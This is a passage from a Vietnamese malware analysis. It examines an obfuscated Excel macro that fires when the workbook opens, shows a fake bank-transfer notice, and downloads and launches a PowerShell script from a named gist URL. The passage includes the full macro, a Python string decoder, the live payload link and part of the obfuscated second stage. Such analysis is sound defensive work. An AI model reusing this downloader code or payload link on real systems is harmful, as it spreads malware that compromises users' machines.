¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ = 4 To Len(´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤·) ´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤· = 2 Next End Function Sub Workbook_Open() Dim ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ As Object Dim ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ As String Dim ¤¸¿º«¡¬¡°µ²¢¹¾¿¡¼²¥¾®¨¶µ»¾«º½¼»ª²¢¾ª¤»¹¬»¾»¸¤µµ°¡§¬¿§¢¥§¥£¶¢¥©¨ As String Dim §»¶¬¡¦¹³¾¸¸³££¹´´¸³¥¦´¢¹¥··£°¿²»º¶°°¥©²¢°¾ª«°©«®·½½··´®¹°µµ©½½§¥·°»¢¼¼´¡¦¡«¹ As String Dim ¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ As Integer ¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ = Chr(50) + Chr(48) + Chr(48) Set ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ = CreateObject("WScript.Shell") ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ = ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§.SpecialFolders("AppData") Dim ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ Dim ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ Dim ¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©¶ Dim ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° As Long Dim ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» As String Dim ¿¨¡©§¾¡º·¼½µ¡®¾¥¼½«¹´¥¥¶²°»¤¡·»°¬£°¿¥§¬¸©º¢¾¥·´£¹¥¡½¬¸ª´º°»§¬¥¡£¢¦»·¶ As Long Dim »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ As String Dim »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· As Long Dim ¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ As String Dim °»»¦¡½º®¤¼º¬³¤³º¸¶®¨½®©µ«¢´¾´··¦«º¬º°¥²ª¹«¿º¼£º·¦¢¬°¢¾§µ²° As String Dim £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ As Long Dim ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ Dim ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ Dim ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ As Integer Dim ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² Dim ®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°© ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ = 1 Range("A1").Value = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("4BEiàiuP3x6¿QEi³") Dim ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ As String ´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³ = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir" & vbCrLf & "ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P" & vbCrLf & "@m@m@mo@@§mmm" & vbCrLf & "g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu" & vbCrLf & "t_iI:PTtPt_iI" ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³) MsgBox ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤, vbInformation, ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿") Dim ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª As Date Dim ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ As Date ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª = Date ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ = DateSerial(2023, 6, 6) If ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª < ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ Then Set ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² = CreateObject("microsoft.xmlhttp") Set ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ = CreateObject("Shell.Application") ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ = ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ + ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("\k¿i6Ü_~Bb@") ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Open "get", ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².send ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ = ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².responseBody If ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Status = 200 Then Set ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ = CreateObject("adodb.stream") ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Open ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Type = ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Write ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.SaveToFile ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬, ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ + ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Close End If ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥.Open (³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬) Else MsgBox ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("åxi'³P³²ÛP³xP²¿iPQEPk²x") End If End Sub ``` Phát hiện một marco lạ như vầy. Những hàm đầu tiên thì xem giải thích ở đây: ``` +----------+--------------------+---------------------------------------------+ |Type |Keyword |Description | +----------+--------------------+---------------------------------------------+ |AutoExec |AutoOpen |Runs when the Word document is opened | |AutoExec |DocumentOpen |Runs when the Word document is opened | |AutoExec |Document_Open |Runs when the Word or Publisher document is | | | |opened | |AutoExec |Auto_Open |Runs when the Excel Workbook is opened | |AutoExec |Workbook_Open |Runs when the Excel Workbook is opened | |Suspicious|Open |May open a file | |Suspicious|Write |May write to a file (if combined with Open) | |Suspicious|adodb.stream |May create a text file | |Suspicious|SaveToFile |May create a text file | |Suspicious|Shell |May run an executable file or a system | | | |command | |Suspicious|WScript.Shell |May run an executable file or a system | | | |command | |Suspicious|CreateObject |May create an OLE object | |Suspicious|Shell.Application |May run an application (if combined with | | | |CreateObject) | |Suspicious|microsoft.xmlhttp |May download files from the Internet | |Suspicious|Chr |May attempt to obfuscate specific strings | | | |(use option --deobf to deobfuscate) | |Suspicious|Hex Strings |Hex-encoded strings were detected, may be | | | |used to obfuscate strings (option --decode to| | | |see all) | +----------+--------------------+---------------------------------------------+ ``` Có một function, và sub phía sau nó có dùng tới function này, mình tiến hành gỡ rối hàm này. ```python def func(param): a = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåض§Ú¥" var1 = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" var4 = "" for char in param: var2 = a.find(char) if var2 > -1: var3 = var1[var2] var4 += var3 else: var4 += char return var4 ``` ```python argument0= "4BEiàiuP3x6¿QEi³" argument1 = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir\" & vbCrLf & \"ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P\" & vbCrLf & \"@m@m@mo@@§mmm\" & vbCrLf & \"g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu\" & vbCrLf & \"t_iI:PTtPt_iI" argument2= "pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿" argument3= "\k¿i6Ü_~Bb@" argument4= "ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@" argument5= "åxi'³P³²ÛP³xP²¿iPQEPk²x" res=[] res.append(func(argument0)) res.append(func(argument1)) res.append(func(argument2)) res.append(func(argument3)) res.append(func(argument4)) res.append(func(argument5)) for i in res: print(i) ``` Ghép cả hai cái lại để run thì: ](img/Untitled%2020.png) link: [https://gist.githubusercontent.com/bquanman/98da73d49faec0cbbdab02d4fd84adaa/raw/8de8b90981e667652b1a16f5caed364fdc311b77/a80sc012.ps1](https://gist.githubusercontent.com/bquanman/98da73d49faec0cbbdab02d4fd84adaa/raw/8de8b90981e667652b1a16f5caed364fdc311b77/a80sc012.ps1) ```powershell . ((VaRIablE '*MdR*').NAmE[3,11,2]-JOIn'') (nEW-OBJeCT IO.cOmPrEsSion.DeflAteSTREam( [sYStEm.IO.MeMOrYSTreAM][CoNVeRt]::frOMBase64sTriNG('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